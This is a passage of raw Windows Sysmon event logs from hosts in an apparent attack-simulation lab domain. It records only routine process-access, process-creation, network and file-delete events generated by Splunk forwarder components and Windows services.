09:17:26.399{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979952Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979951Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979950Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979949Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979948Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8C26-6151-EB79-00000000FD01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979947Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979946Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.399{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C26-6151-EB79-00000000FD01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979945Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:26.384{69CF5F33-8C26-6151-EB79-00000000FD01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001051576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.589{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64828- 23542300x80000000000000001051579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:27.652{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF6AA2982AADE706F649BB0E6E6D16C7,SHA256=32D8FCFD6C2C8085AFE97BCEF8383FAC110868ABBEE90D423D670FBDA25E1DBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:27.552{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22252EDB29CFB7BC22EE2C94829D9D75,SHA256=374ADB3B16AA58920228C7195FE7417F7134931DEDA91C3C6E3B56C777583027,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979990Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.868{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D4F34BD2EF3AB1AA9000AD9C2DF008F,SHA256=07F9049BDF7DC9EE6CB44A24DC6B0A5019F375C6D89646B6CFFFE48134E945D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979989Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.837{69CF5F33-8C27-6151-ED79-00000000FD01}7562080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979988Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C27-6151-ED79-00000000FD01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979987Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979986Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979985Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979984Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979983Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979982Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979981Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979980Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979979Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979978Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8C27-6151-ED79-00000000FD01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979977Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.680{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C27-6151-ED79-00000000FD01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979976Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:27.666{69CF5F33-8C27-6151-ED79-00000000FD01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000979975Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:23.820{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59451-false10.0.1.12-8000- 23542300x80000000000000001051582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:28.566{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCE603053A3D65EE763307C33ED324A4,SHA256=73380C3CA3A31238837F1477429732B723EB30586A9F296FC1D2FFB7673378C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980005Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C28-6151-EE79-00000000FD01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980004Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 